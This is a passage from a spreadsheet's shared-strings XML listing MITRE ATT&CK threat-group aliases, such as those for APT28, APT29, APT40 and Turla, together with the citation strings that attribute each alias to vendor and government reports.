    <t>TAG-22</t>
  </si>
  <si>
    <t>Beijing Group, Elderwood Gang, Sneaky Panda</t>
  </si>
  <si>
    <t>Bleeding Bear, Lorec Bear, Lorec53, Saint Bear, UAC-0056, UNC2589</t>
  </si>
  <si>
    <t>ITG08, Magecart Group 6, Skeleton Spider</t>
  </si>
  <si>
    <t>Carbon Spider, GOLD NIAGARA, ITG14</t>
  </si>
  <si>
    <t>Parisite, Pioneer Kitten, UNC757</t>
  </si>
  <si>
    <t>Operation Soft Cell</t>
  </si>
  <si>
    <t>ACTINIUM, Armageddon, DEV-0157, IRON TILDEN, Primitive Bear, Shuckworm</t>
  </si>
  <si>
    <t>Operation Exchange Marauder</t>
  </si>
  <si>
    <t>Lyceum, Siamesekitten, Spirlin</t>
  </si>
  <si>
    <t>Cloud Atlas, Inception Framework</t>
  </si>
  <si>
    <t>Evil Corp</t>
  </si>
  <si>
    <t>APT15, GREF, Mirage, NICKEL, Playful Dragon, RoyalAPT, Vixen Panda</t>
  </si>
  <si>
    <t>Black Banshee, STOLEN PENCIL, Thallium, Velvet Chollima</t>
  </si>
  <si>
    <t>DEV-0537</t>
  </si>
  <si>
    <t>Guardians of Peace, HIDDEN COBRA, Labyrinth Chollima, NICKEL ACADEMY, ZINC</t>
  </si>
  <si>
    <t>Raspite</t>
  </si>
  <si>
    <t>APT40, BRONZE MOHAWK, Gadolinium, Kryptonite Panda, MUDCARP, TEMP.Jumper, TEMP.Periscope</t>
  </si>
  <si>
    <t>DRAGONFISH, Spring Dragon</t>
  </si>
  <si>
    <t>APT-C-43, El Machete</t>
  </si>
  <si>
    <t>APT35, COBALT ILLUSION, Charming Kitten, ITG18, Newscaster, Phosphorus, TA453</t>
  </si>
  <si>
    <t>Gaza Cybergang, Operation Molerats</t>
  </si>
  <si>
    <t>Earth Vetala, MERCURY, Seedworm, Static Kitten, TEMP.Zagros</t>
  </si>
  <si>
    <t>BRONZE PRESIDENT, RedDelta, TA416</t>
  </si>
  <si>
    <t>DustSquad</t>
  </si>
  <si>
    <t>APT34, COBALT GYPSY, Helix Kitten, IRN2</t>
  </si>
  <si>
    <t>Chinastrats, Dropping Elephant, Hangover Group, MONSOON, Operation Hangover</t>
  </si>
  <si>
    <t>APT2, MSUpdater</t>
  </si>
  <si>
    <t>BlackEnergy (Group), ELECTRUM, IRON VIKING, Quedagh, Telebots, Voodoo Bear</t>
  </si>
  <si>
    <t>Rattlesnake, T-APT-04</t>
  </si>
  <si>
    <t>Whisper Spider</t>
  </si>
  <si>
    <t>COBALT DICKENS, TA407</t>
  </si>
  <si>
    <t>ProjectSauron</t>
  </si>
  <si>
    <t>Hive0065</t>
  </si>
  <si>
    <t>GOLD CABIN, Shathak</t>
  </si>
  <si>
    <t>XENOTIME</t>
  </si>
  <si>
    <t>TG-1314</t>
  </si>
  <si>
    <t>APT27, BRONZE UNION, Earth Smilodon, Emissary Panda, Iron Tiger, LuckyMouse, TG-3390</t>
  </si>
  <si>
    <t>BRONZE HUNTLEY, CactusPete, Earth Akhlut, Karma Panda</t>
  </si>
  <si>
    <t>APT36, COPPER FIELDSTONE, Mythic Leopard, ProjectM</t>
  </si>
  <si>
    <t>KeyBoy, Pirate Panda</t>
  </si>
  <si>
    <t>Belugasturgeon, Group 88, IRON HUNTER, Krypton, Snake, Venomous Bear, Waterbug, WhiteBear</t>
  </si>
  <si>
    <t>Lebanese Cedar</t>
  </si>
  <si>
    <t>Bahamut</t>
  </si>
  <si>
    <t>Blackfly</t>
  </si>
  <si>
    <t>Grim Spider, TEMP.MixMaster, UNC1878</t>
  </si>
  <si>
    <t>APT31</t>
  </si>
  <si>
    <t>APT10, CVNX, Cicada, HOGFISH, POTASSIUM, Red Apollo, Stone Panda</t>
  </si>
  <si>
    <t>(Citation: QiAnXin APT-C-36 Feb2019)</t>
  </si>
  <si>
    <t>(Citation: Mandiant APT1), (Citation: Mandiant APT1), (Citation: CrowdStrike Putter Panda)</t>
  </si>
  <si>
    <t>(Citation: Moran 2014), (Citation: Meyers Numbered Panda) (Citation: Moran 2014), (Citation: Meyers Numbered Panda) (Citation: Moran 2014), (Citation: Meyers Numbered Panda)</t>
  </si>
  <si>
    <t>(Citation: FireEye APT17)</t>
  </si>
  <si>
    <t>(Citation: ThreatStream Evasion Analysis)(Citation: Anomali Evasive Maneuvers July 2015), (Citation: ThreatStream Evasion Analysis)(Citation: Anomali Evasive Maneuvers July 2015), (Citation: ThreatStream Evasion Analysis)</t>
  </si>
  <si>
    <t>(Citation: Unit 42 C0d0so0 Jan 2016), (Citation: Unit 42 C0d0so0 Jan 2016), (Citation: FireEye APT Groups), (Citation: Dark Reading Codoso Feb 2015)</t>
  </si>
  <si>
    <t>(Citation: Crowdstrike DNC June 2016)(Citation: Kaspersky Sofacy)(Citation: ESET Sednit Part 3)(Citation: Ars Technica GRU indictment Jul 2018)(Citation: Talos Seduploader Oct 2017)(Citation: Symantec APT28 Oct 2018)(Citation: Securelist Sofacy Feb 2018)(Citation: Cybersecurity Advisory GRU Brute Force Campaign July 2021), (Citation: Talos Seduploader Oct 2017), (Citation: Secureworks IRON TWILIGHT Profile)(Citation: Secureworks IRON TWILIGHT Active Measures March 2017), (Citation: SecureWorks TG-4127)(Citation: ESET Sednit Part 3)(Citation: TrendMicro Pawn Storm Dec 2020) , (Citation: Accenture SNAKEMACKEREL Nov 2018), (Citation: Kaspersky Sofacy)(Citation: ESET Sednit Part 3)(Citation: Microsoft STRONTIUM Aug 2019)(Citation: Microsoft STRONTIUM New Patterns Cred Harvesting Sept 2020)(Citation: TrendMicro Pawn Storm Dec 2020)(Citation: Cybersecurity Advisory GRU Brute Force Campaign July 2021), This designation has been used in reporting both to refer to the threat group and its associated malware [JHUHUGIT](https://attack.mitre.org/software/S0044).(Citation: FireEye APT28 January 2017)(Citation: SecureWorks TG-4127)(Citation: Kaspersky Sofacy)(Citation: Ars Technica GRU indictment Jul 2018), This designation has been used in reporting both to refer to the threat group and its associated malware.(Citation: FireEye APT28)(Citation: SecureWorks TG-4127)(Citation: Crowdstrike DNC June 2016)(Citation: ESET Sednit Part 3)(Citation: Ars Technica GRU indictment Jul 2018)(Citation: Talos Seduploader Oct 2017), (Citation: Symantec APT28 Oct 2018), (Citation: SecureWorks TG-4127), (Citation: SecureWorks TG-4127), (Citation: ESET Sednit Part 3)(Citation: Talos Seduploader Oct 2017)(Citation: Talos Seduploader Oct 2017)</t>
  </si>
  <si>
    <t>(Citation: Crowdstrike DNC June 2016)(Citation: ESET Dukes October 2019)(Citation: NCSC APT29 July 2020)(Citation: Cybersecurity Advisory SVR TTP May 2021)(Citation: CrowdStrike StellarParticle January 2022), (Citation: Crowdstrike DNC June 2016), (Citation: Volexity SolarWinds), (Citation: Secureworks IRON HEMLOCK Profile), (Citation: Secureworks IRON RITUAL Profile), (Citation: MSTIC NOBELIUM Mar 2021)(Citation: MSTIC NOBELIUM May 2021)(Citation: MSTIC Nobelium Toolset May 2021)(Citation: MSRC Nobelium June 2021), (Citation: SentinelOne NobleBaron June 2021), (Citation: CrowdStrike SUNSPOT Implant January 2021)(Citation: CrowdStrike StellarParticle January 2022), (Citation: F-Secure The Dukes)(Citation: ESET Dukes October 2019)(Citation: NCSC APT29 July 2020)(Citation: Cybersecurity Advisory SVR TTP May 2021), (Citation: FireEye SUNBURST Backdoor December 2020), (Citation: Microsoft Unidentified Dec 2018)</t>
  </si>
  <si>
    <t>(Citation: Symantec Buckeye), (Citation: PWC Pirpi Scanbox) (Citation: Recorded Future APT3 May 2017) (Citation: Symantec Buckeye), (Citation: PWC Pirpi Scanbox), (Citation: Recorded Future APT3 May 2017) (Citation: Symantec Buckeye), (Citation: Recorded Future APT3 May 2017) (Citation: Symantec Buckeye), (Citation: FireEye Clandestine Wolf) (Citation: Recorded Future APT3 May 2017) (Citation: Symantec Buckeye)</t>
  </si>
  <si>
    <t>(Citation: ESET OceanLotus)(Citation: Cybereason Oceanlotus May 2017)(Citation: ESET OceanLotus Mar 2019)(Citation: Amnesty Intl. Ocean Lotus February 2021), (Citation: FireEye APT32 May 2017)(Citation: Volexity OceanLotus Nov 2017)(Citation: Cybereason Oceanlotus May 2017)(Citation: ESET OceanLotus Mar 2019)(Citation: Amnesty Intl. Ocean Lotus February 2021), (Citation: Cybereason Oceanlotus May 2017)</t>
  </si>
  <si>
    <t>(Citation: Symantec Elfin Mar 2019), (Citation: Microsoft Holmium June 2020)</t>
  </si>
  <si>
    <t>(Citation: FireEye APT37 Feb 2018), (Citation: Volexity InkySquid BLUELIGHT August 2021), (Citation: FireEye APT37 Feb 2018), (Citation: CrowdStrike Richochet Chollima September 2021), (Citation: Securelist ScarCruft Jun 2016)(Citation: FireEye APT37 Feb 2018)(Citation: Securelist ScarCruft May 2019), (Citation: FireEye APT37 Feb 2018)</t>
  </si>
  <si>
    <t>(Citation: CISA AA20-239A BeagleBoyz August 2020), (Citation: Kaspersky Lazarus Under The Hood Blog 2017), (Citation: SecureWorks NICKEL GLADSTONE profile Sept 2021), (Citation: CrowdStrike Stardust Chollima Profile April 2018)(Citation: CrowdStrike GTR 2021 June 2021)</t>
  </si>
  <si>
    <t>Activities associated with APT39 largely align with a group publicly referred to as Chafer.(Citation: FireEye APT39 Jan 2019)(Citation: Symantec Chafer Dec 2015)(Citation: Dark Reading APT39 JAN 2019)(Citation: FBI FLASH APT39 September 2020)(Citation: Dept. of Treasury Iran Sanctions September 2020)(Citation: DOJ Iran Indictments September 2020), (Citation: FBI FLASH APT39 September 2020)(Citation: Dept. of Treasury Iran Sanctions September 2020)(Citation: DOJ Iran Indictments September 2020), (Citation: Crowdstrike GTR2020 Mar 2020)</t>
  </si>
  <si>
    <t>(Citation: Crowdstrike GTR2020 Mar 2020)</t>
  </si>
  <si>
    <t>(Citation: FireEye Operation Saffron Rose 2013), (Citation: CrowdStrike Flying Kitten ), (Citation: FireEye Operation Saffron Rose 2013), Analysis of infrastructure, tools, and modes of operation revealed a potential relationship between [Ajax Security Team](https://attack.mitre.org/groups/G0130) and the campaign Operation Woolen-Goldfish.(Citation: Check Point Rocket Kitten)(Citation: TrendMicro Operation Woolen Goldfish March 2015), Analysis of infrastructure, tools, and modes of operation revealed a potential relationship between [Ajax Security Team](https://attack.mitre.org/groups/G0130) and Rocket Kitten.(Citation: Check Point Rocket Kitten)(Citation: IranThreats Kittens Dec 2017)</t>
  </si>
  <si>
    <t>(Citation: CrowdStrike Silent Chollima Adversary September 2021)</t>
  </si>
  <si>
    <t>(Citation: Cisco Group 72)</t>
  </si>
  <si>
    <t>(Citation: Cisco Talos Bitter Bangladesh May 2022)</t>
  </si>
  <si>
    <t>(Citation: Trend Micro Daserf Nov 2017)(Citation: Trend Micro Tick November 2019), (Citation: Trend Micro Daserf Nov 2017)(Citation: Symantec Tick Apr 2016)(Citation: Trend Micro Tick November 2019)</t>
  </si>
  <si>
    <t>(Citation: Symantec Palmerworm Sep 2020)(Citation: IronNet BlackTech Oct 2021)</t>
  </si>
  <si>
    <t>(Citation: Fox-It Anunak Feb 2015)</t>
  </si>
  <si>
    <t>(Citation: Dell Threat Group 2889), (Citation: Dell Threat Group 2889)</t>
  </si>
  <si>
    <t>(Citation: Talos Cobalt Group July 2018) (Citation: Crowdstrike Global Threat Report Feb 2018)(Citation: Morphisec Cobalt Gang Oct 2018), (Citation: Crowdstrike Global Threat Report Feb 2018), (Citation: Secureworks GOLD KINGSWOOD September 2018)</t>
  </si>
  <si>
    <t>(Citation: Microsoft Digital Defense FY20 Sept 2020)(Citation: Microsoft DUBNIUM June 2016)(Citation: Microsoft DUBNIUM Flash June 2016)(Citation: Microsoft DUBNIUM July 2016)</t>
  </si>
  <si>
    <t>(Citation: Symantec Black Vine), (Citation: RSA Shell Crew), (Citation: RSA Shell Crew), (Citation: RSA Shell Crew), (Citation: RSA Shell Crew)</t>
  </si>
  <si>
    <t>(Citation: Gigamon Berserk Bear October 2021)(Citation: DOJ Russia Targeting Critical Infrastructure March 2022)(Citation: UK GOV FSB Factsheet April 2022), (Citation: Secureworks IRON LIBERTY July 2019)(Citation: Gigamon Berserk Bear October 2021)(Citation: DOJ Russia Targeting Critical Infrastructure March 2022)(Citation: UK GOV FSB Factsheet April 2022), (Citation: Dragos DYMALLOY )(Citation: UK GOV FSB Factsheet April 2022), (Citation: Symantec Dragonfly)(Citation: Secureworks IRON LIBERTY July 2019)(Citation: Secureworks MCMD July 2019)(Citation: Secureworks Karagany July 2019)(Citation: Gigamon Berserk Bear October 2021)(Citation: DOJ Russia Targeting Critical Infrastructure March 2022)(Citation: UK GOV FSB Factsheet April 2022), (Citation: Secureworks IRON LIBERTY July 2019)(Citation: Secureworks MCMD July 2019)(Citation: Secureworks Karagany July 2019)(Citation: UK GOV FSB Factsheet April 2022), (Citation: Mandiant Ukraine Cyber Threats January 2022)(Citation: Gigamon Berserk Bear October 2021), (Citation: Secureworks IRON LIBERTY July 2019)(Citation: UK GOV FSB Factsheet April 2022)</t>
  </si>
  <si>
    <t>(Citation: Recorded Future TAG-22 July 2021)</t>
  </si>
  <si>
    <t>(Citation: CSM Elderwood Sept 2012), (Citation: Symantec Elderwood Sept 2012) (Citation: CSM Elderwood Sept 2012), (Citation: CSM Elderwood Sept 2012)</t>
  </si>
  <si>
    <t>(Citation: CrowdStrike Ember Bear Profile March 2022), (Citation: CrowdStrike Ember Bear Profile March 2022), (Citation: CrowdStrike Ember Bear Profile March 2022), (Citation: CrowdStrike Ember Bear Profile March 2022), (Citation: CrowdStrike Ember Bear Profile March 2022), (Citation: Mandiant UNC2589 March 2022)</t>
  </si>
  <si>
    <t>(Citation: Security Intelligence More Eggs Aug 2019), (Citation: Security Intelligence ITG08 April 2020), (Citation: Crowdstrike Global Threat Report Feb 2018)</t>
  </si>
  <si>
    <t>(Citation: CrowdStrike Carbon Spider August 2021), (Citation: Secureworks GOLD NIAGARA Threat Profile), ITG14 shares campaign overlap with [FIN7](https://attack.mitre.org/groups/G0046).(Citation: IBM Ransomware Trends September 2020)</t>
  </si>
  <si>
    <t>(Citation: Dragos PARISITE )(Citation: ClearkSky Fox Kitten February 2020)(Citation: CrowdStrike PIONEER KITTEN August 2020), (Citation: CrowdStrike PIONEER KITTEN August 2020)(Citation: CISA AA20-259A Iran-Based Actor September 2020), (Citation: CISA AA20-259A Iran-Based Actor September 2020)(Citation: CrowdStrike PIONEER KITTEN August 2020)</t>
  </si>
  <si>
    <t>(Citation: Cybereason Soft Cell June 2019)</t>
  </si>
  <si>
    <t>(Citation: Microsoft Actinium February 2022), (Citation: Symantec Shuckworm January 2022), (Citation: Microsoft Actinium February 2022), (Citation: Secureworks IRON TILDEN Profile), (Citation: Unit 42 Gamaredon February 2022), (Citation: Symantec Shuckworm January 2022)</t>
  </si>
  <si>
    <t>(Citation: Volexity Exchange Marauder March 2021)</t>
  </si>
  <si>
    <t>(Citation: SecureWorks August 2019), (Citation: ClearSky Siamesekitten August 2021), (Citation: Accenture Lyceum Targets November 2021)</t>
  </si>
  <si>
    <t>(Citation: Kaspersky Cloud Atlas December 2014), (Citation: Symantec Inception Framework March 2018)</t>
  </si>
  <si>
    <t>(Citation: Crowdstrike EvilCorp March 2021)(Citation: Treasury EvilCorp Dec 2019)</t>
  </si>
  <si>
    <t>(Citation: NCC Group APT15 Alive and Strong), (Citation: NCC Group APT15 Alive and Strong), (Citation: NCC Group APT15 Alive and Strong), (Citation: Microsoft NICKEL December 2021), (Citation: NCC Group APT15 Alive and Strong)(Citation: APT15 Intezer June 2018), (Citation: APT15 Intezer June 2018), (Citation: NCC Group APT15 Alive and Strong)(Citation: APT15 Intezer June 2018)</t>
  </si>
  <si>
    <t>(Citation: Cybereason Kimsuky November 2020)(Citation: Malwarebytes Kimsuky June 2021), (Citation: Netscout Stolen Pencil Dec 2018), (Citation: Cybereason Kimsuky November 2020)(Citation: Malwarebytes Kimsuky June 2021), (Citation: Zdnet Kimsuky Dec 2018)(Citation: ThreatConnect Kimsuky September 2020)(Citation: Malwarebytes Kimsuky June 2021)</t>
  </si>
  <si>
    <t>(Citation: MSTIC DEV-0537 Mar 2022)</t>
  </si>
  <si>
    <t>(Citation: US-CERT HIDDEN COBRA June 2017), The U.S. Government refers to malicious cyber activity by the North Korean government as HIDDEN COBRA.(Citation: US-CERT HIDDEN COBRA June 2017)(Citation: US-CERT HOPLIGHT Apr 2019), (Citation: CrowdStrike Labyrinth Chollima Feb 2022), (Citation: Secureworks NICKEL ACADEMY Dec 2017), (Citation: Microsoft ZINC disruption Dec 2017)</t>
  </si>
  <si>
    <t>(Citation: Dragos Raspite Aug 2018)</t>
  </si>
  <si>
    <t>FireEye reporting on TEMP.Periscope (which was combined into APT40) indicated TEMP.Periscope was reported upon as Leviathan.(Citation: CISA AA21-200A APT40 July 2021)(Citation: Proofpoint Leviathan Oct 2017)(Citation: FireEye Periscope March 2018)(Citation: FireEye APT40 March 2019), (Citation: CISA AA21-200A APT40 July 2021)(Citation: SecureWorks BRONZE MOHAWK n.d.), (Citation: CISA AA21-200A APT40 July 2021)(Citation: MSTIC GADOLINIUM September 2020), (Citation: CISA AA21-200A APT40 July 2021)(Citation: Crowdstrike KRYPTONITE PANDA August 2018), (Citation: CISA AA21-200A APT40 July 2021)(Citation: Accenture MUDCARP March 2019), [Leviathan](https://attack.mitre.org/groups/G0065) was previously reported upon by FireEye as TEMP.Periscope and TEMP.Jumper.(Citation: CISA AA21-200A APT40 July 2021)(Citation: FireEye APT40 March 2019), [Leviathan](https://attack.mitre.org/groups/G0065) was previously reported upon by FireEye as TEMP.Periscope and TEMP.Jumper.(Citation: CISA AA21-200A APT40 July 2021)(Citation: FireEye Periscope March 2018)(Citation: FireEye APT40 March 2019)</t>
  </si>
  <si>
    <t>(Citation: Accenture Dragonfish Jan 2018), (Citation: Spring Dragon Jun 2015)(Citation: Accenture Dragonfish Jan 2018)</t>
  </si>
  <si>
    <t>(Citation: 360 Machete Sep 2020), (Citation: Cylance Machete Mar 2017)</t>
  </si>
  <si>
    <t>(Citation: FireEye APT35 2018)(Citation: Certfa Charming Kitten January 2021)(Citation: Check Point APT35 CharmPower January 2022), (Citation: Secureworks COBALT ILLUSION Threat Profile), (Citation: ClearSky Charming Kitten Dec 2017)(Citation: Eweek Newscaster and Charming Kitten May 2014)(Citation: ClearSky Kittens Back 2 Oct 2019)(Citation: ClearSky Kittens Back 3 August 2020)(Citation: Proofpoint TA453 March 2021)(Citation: Check Point APT35 CharmPower January 2022), (Citation: IBM ITG18 2020), Link analysis of infrastructure and tools revealed a potential relationship between Magic Hound and the older attack campaign called Newscaster (aka Newscasters).(Citation: Unit 42 Magic Hound Feb 2017)(Citation: FireEye APT35 2018), (Citation: Microsoft Phosphorus Mar 2019)(Citation: Microsoft Phosphorus Oct 2020)(Citation: US District Court of DC Phosphorus Complaint 2019)(Citation: Certfa Charming Kitten January 2021)(Citation: Proofpoint TA453 March 2021)(Citation: Check Point APT35 CharmPower January 2022), (Citation: Proofpoint TA453 March 2021)(Citation: Proofpoint TA453 July2021)(Citation: Check Point APT35 CharmPower January 2022)</t>
  </si>
  <si>
    <t>(Citation: DustySky)(Citation: Kaspersky MoleRATs April 2019)(Citation: Cybereason Molerats Dec 2020), (Citation: FireEye Operation Molerats)(Citation: Cybereason Molerats Dec 2020)</t>
  </si>
  <si>
    <t>(Citation: Trend Micro Muddy Water March 2021), (Citation: Anomali Static Kitten February 2021), (Citation: Symantec MuddyWater Dec 2018)(Citation: Anomali Static Kitten February 2021)(Citation: Trend Micro Muddy Water March 2021), (Citation: Anomali Static Kitten February 2021)(Citation: Trend Micro Muddy Water March 2021), (Citation: FireEye MuddyWater Mar 2018)(Citation: Anomali Static Kitten February 2021)(Citation: Trend Micro Muddy Water March 2021)</t>
  </si>
  <si>
    <t>(Citation: Secureworks BRONZE PRESIDENT December 2019), (Citation: Recorded Future REDDELTA July 2020)(Citation: Proofpoint TA416 Europe March 2022), (Citation: Proofpoint TA416 November 2020)</t>
  </si>
  <si>
    <t>(Citation: Security Affairs DustSquad Oct 2018)(Citation: Securelist Octopus Oct 2018)(Citation: SecurityWeek Nomadic Octopus Oct 2018)</t>
  </si>
  <si>
    <t>This group was previously tracked under two distinct groups, APT34 and OilRig, but was combined due to additional reporting giving higher confidence about the overlap of the activity. (Citation: Unit 42 QUADAGENT July 2018) (Citation: FireEye APT34 Dec 2017)(Citation: Check Point APT34 April 2021), (Citation: Secureworks COBALT GYPSY Threat Profile), (Citation: Unit 42 QUADAGENT July 2018)(Citation: Crowdstrike Helix Kitten Nov 2018), (Citation: Crowdstrike Helix Kitten Nov 2018)</t>
  </si>
  <si>
    <t>The name StrongPity has also been used to describe the group and the malware used by the group.(Citation: Bitdefender StrongPity June 2020)(Citation: Talos Promethium June 2020)</t>
  </si>
  <si>
    <t>(Citation: Securelist Dropping Elephant), (Citation: Symantec Patchwork) (Citation: Securelist Dropping Elephant) (Citation: PaloAlto Patchwork Mar 2018) (Citation: Volexity Patchwork June 2018), [Patchwork](https://attack.mitre.org/groups/G0040) and the Hangover Group have both been referenced as aliases for the threat group associated with Operation Monsoon.(Citation: PaloAlto Patchwork Mar 2018)(Citation: Unit 42 BackConfig May 2020)(Citation: Forcepoint Monsoon), MONSOON is the name of an espionage campaign; we use it here to refer to the actor group behind the campaign. (Citation: Forcepoint Monsoon) (Citation: PaloAlto Patchwork Mar 2018), It is believed that the actors behind [Patchwork](https://attack.mitre.org/groups/G0040) are the same actors behind Operation Hangover. (Citation: Forcepoint Monsoon) (Citation: Operation Hangover May 2013)</t>
  </si>
  <si>
    <t>(Citation: Cylance Putter Panda), (Citation: CrowdStrike Putter Panda)</t>
  </si>
  <si>
    <t>(Citation: NCSC Sandworm Feb 2020)(Citation: UK NCSC Olympic Attacks October 2020), (Citation: Dragos ELECTRUM)(Citation: UK NCSC Olympic Attacks October 2020), (Citation: Secureworks IRON VIKING )(Citation: US District Court Indictment GRU Unit 74455 October 2020)(Citation: UK NCSC Olympic Attacks October 2020), (Citation: iSIGHT Sandworm 2014) (Citation: F-Secure BlackEnergy 2014)(Citation: UK NCSC Olympic Attacks October 2020), (Citation: NCSC Sandworm Feb 2020)(Citation: US District Court Indictment GRU Unit 74455 October 2020)(Citation: UK NCSC Olympic Attacks October 2020), (Citation: CrowdStrike VOODOO BEAR)(Citation: US District Court Indictment GRU Unit 74455 October 2020)(Citation: UK NCSC Olympic Attacks October 2020)</t>
  </si>
  <si>
    <t>(Citation: Cyble Sidewinder September 2020), (Citation: Cyble Sidewinder September 2020)</t>
  </si>
  <si>
    <t>(Citation: Secureworks COBALT DICKENS August 2018)(Citation: Secureworks COBALT DICKENS September 2019)(Citation: Proofpoint TA407 September 2019)(Citation: Malwarebytes Silent Librarian October 2020), (Citation: Proofpoint TA407 September 2019)(Citation: Malwarebytes Silent Librarian October 2020)</t>
  </si>
  <si>
    <t>ProjectSauron is used to refer both to the threat group also known as G0041 as well as the malware platform also known as S0125. (Citation: Kaspersky ProjectSauron Blog) (Citation: Kaspersky ProjectSauron Full Report)</t>
  </si>
  <si>
    <t>(Citation: IBM TA505 April 2020)</t>
  </si>
  <si>
    <t>(Citation: Secureworks GOLD CABIN), (Citation: Unit 42 Valak July 2020)(Citation: Unit 42 TA551 Jan 2021)</t>
  </si>
  <si>
    <t>The activity group XENOTIME, as defined by Dragos, has overlaps with activity reported upon by FireEye about TEMP.Veles as well as the actors behind [TRITON](https://attack.mitre.org/software/S0609) .(Citation: Dragos Xenotime 2018)(Citation: Pylos Xenotime 2019)(Citation: FireEye TRITON 2019)(Citation: FireEye TEMP.Veles 2018 )</t>
  </si>
  <si>
    <t>(Citation: Dell TG-1314)</t>
  </si>
  <si>
    <t>(Citation: Nccgroup Emissary Panda May 2018)(Citation: Securelist LuckyMouse June 2018)(Citation: Hacker News LuckyMouse June 2018)(Citation: Trend Micro Iron Tiger April 2021), (Citation: SecureWorks BRONZE UNION June 2017)(Citation: Nccgroup Emissary Panda May 2018), (Citation: Trend Micro Iron Tiger April 2021), (Citation: Gallagher 2015)(Citation: Nccgroup Emissary Panda May 2018)(Citation: Securelist LuckyMouse June 2018)(Citation: Hacker News LuckyMouse June 2018)(Citation: Unit42 Emissary Panda May 2019)(Citation: Trend Micro Iron Tiger April 2021), (Citation: Hacker News LuckyMouse June 2018)(Citation: Trend Micro Iron Tiger April 2021), (Citation: Securelist LuckyMouse June 2018)(Citation: Hacker News LuckyMouse June 2018)(Citation: Trend Micro Iron Tiger April 2021), (Citation: Dell TG-3390)(Citation: Nccgroup Emissary Panda May 2018)(Citation: Hacker News LuckyMouse June 2018)</t>
  </si>
  <si>
    <t>(Citation: Secureworks BRONZE HUNTLEY ), (Citation: Kaspersky CactusPete Aug 2020), (Citation: TrendMicro Tonto Team October 2020), (Citation: Kaspersky CactusPete Aug 2020)(Citation: CrowdStrike Manufacturing Threat July 2020)</t>
  </si>
  <si>
    <t>(Citation: Talos Transparent Tribe May 2021), (Citation: Secureworks COPPER FIELDSTONE Profile), (Citation: Crowdstrike Mythic Leopard Profile)(Citation: Kaspersky Transparent Tribe August 2020)(Citation: Talos Transparent Tribe May 2021), (Citation: Unit 42 ProjectM March 2016)(Citation: Kaspersky Transparent Tribe August 2020)</t>
  </si>
  <si>
    <t>(Citation: Unit 42 Tropic Trooper Nov 2016)(Citation: TrendMicro Tropic Trooper Mar 2018), (Citation: Crowdstrike Pirate Panda April 2020)</t>
  </si>
  <si>
    <t>(Citation: Accenture HyperStack October 2020), (Citation: Leonardo Turla Penquin May 2020), (Citation: Secureworks IRON HUNTER Profile), (Citation: CrowdStrike VENOMOUS BEAR), (Citation: CrowdStrike VENOMOUS BEAR)(Citation: ESET Turla PowerShell May 2019)(Citation: Talos TinyTurla September 2021), (Citation: CrowdStrike VENOMOUS BEAR)(Citation: Talos TinyTurla September 2021), Based similarity in TTPs and malware used, Turla and Waterbug appear to be the same group.(Citation: Symantec Waterbug), WhiteBear is a designation used by Securelist to describe a cluster of activity that has overlaps with activity described by others as Turla, but appears to have a separate focus.(Citation: Securelist WhiteBear Aug 2017)(Citation: Talos TinyTurla September 2021)</t>
  </si>
  <si>
    <t>(Citation: ClearSky Lebanese Cedar Jan 2021)</t>
  </si>
  <si>
    <t>(Citation: SANS Windshift August 2018)</t>
  </si>
  <si>
    <t>(Citation: Symantec Suckfly March 2016)</t>
  </si>
  <si>
    <t>(Citation: CrowdStrike Ryuk January 2019)(Citation: CrowdStrike Grim Spider May 2019), (Citation: FireEye Ryuk and Trickbot January 2019), (Citation: FireEye KEGTAP SINGLEMALT October 2020)</t>
  </si>
  <si>
    <t>(Citation: Check Point APT31 February 2021)</t>
  </si>
  <si>
    <t>(Citation: Palo Alto menuPass Feb 2017)(Citation: Accenture Hogfish April 2018)(Citation: FireEye APT10 Sept 2018)(Citation: DOJ APT10 Dec 2018)(Citation: Symantec Cicada November 2020), (Citation: PWC Cloud Hopper April 2017)(Citation: DOJ APT10 Dec 2018)(Citation: District Court of NY APT10 Indictment December 2018), (Citation: Symantec Cicada November 2020), (Citation: Accenture Hogfish April 2018), (Citation: DOJ APT10 Dec 2018)(Citation: District Court of NY APT10 Indictment December 2018), (Citation: PWC Cloud Hopper April 2017)(Citation: DOJ APT10 Dec 2018)(Citation: District Court of NY APT10 Indictment December 2018), (Citation: Palo Alto menuPass Feb 2017)(Citation: Accenture Hogfish April 2018)(Citation: DOJ APT10 Dec 2018)(Citation: District Court of NY APT10 Indictment December 2018)(Citation: Symantec Cicada November 2020)</t>
  </si>
  <si>
    <t>(Citation: QiAnXin APT-C-36 Feb2019),(Citation: QiAnXin APT-C-36 Feb2019),</t>
  </si>
  <si>
    <t>(Citation: McAfee Oceansalt Oct 2018),(Citation: Mandiant APT1),(Citation: Mandiant APT1 Appendix),(Citation: Mandiant APT1),(Citation: Mandiant APT1 Appendix),(Citation: FireEye PLA),</t>
  </si>
  <si>
    <t>(Citation: Moran 2014),(Citation: Moran 2013),(Citation: Trend Micro IXESHE 2012),(Citation: Meyers Numbered Panda),(Citation: Moran 2014),(Citation: Trend Micro IXESHE 2012),</t>
  </si>
  <si>
    <t>(Citation: FireEye EPS Awakens Part 2),(Citation: FireEye EPS Awakens Part 2),</t>
  </si>
  <si>
    <t>(Citation: FireEye APT17),(Citation: FireEye APT17),</t>
  </si>
  <si>
    <t>(Citation: ThreatStream Evasion Analysis),(Citation: RSA2017 Detect and Respond Adair),(Citation: Palo Alto DNS Requests),(Citation: Dell Lateral Movement),(Citation: RSA2017 Detect and Respond Adair),(Citation: PaloAlto DNS Requests May 2016),(Citation: Dell Lateral Movement),(Citation: Anomali Evasive Maneuvers July 2015),</t>
  </si>
  <si>
    <t>(Citation: FireEye APT19),(Citation: NCSC Joint Report Public Tools),(Citation: FireEye APT19),(Citation: NCSC Joint Report Public Tools),(Citation: Unit 42 C0d0so0 Jan 2016),</t>
  </si>
  <si>
